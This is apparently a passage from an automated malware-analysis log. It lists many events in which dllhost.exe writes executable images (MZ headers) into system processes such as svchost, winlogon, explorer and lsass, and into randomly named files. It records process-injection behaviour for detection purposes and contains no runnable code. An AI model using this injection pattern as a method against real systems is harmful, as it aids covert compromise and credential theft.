Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E70A460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22D13110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22C8C580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2825F1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AA5E060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20BAEC90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C782530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24066EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 181CEDB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A142790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 195B6F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973830000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DBF9DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A239D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17CFA390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FB7270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF53B50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 164E88A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25177B50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28D5D340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 24EB5E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F153C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D241D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16FADAD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 20E03070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15204DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 3310000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 175C5280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22EF1B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 261DE4D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 226D8930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13E5E930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F843DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27234C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28543540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 2B684340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 247B4700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1DAD8A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE3F3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC87880000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1C39C960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 10C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 20F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 25D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 15D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 26D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 3040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADFC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 195DD590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2C10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1160CB60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 257E1070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 11E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2652E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 254A27C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 30C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24B87DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 28E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 29F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 6D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 205FB3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2C90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A205670000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18EC1F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 3000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26238950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 24D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2786E560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1611FF70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27C0F350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 25D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B279570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1290000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\$nya-onimai2\qVrKPA.exe base: 1910E500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E70A460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22D13110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22C8C580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A80000 value starts with: 4D5A
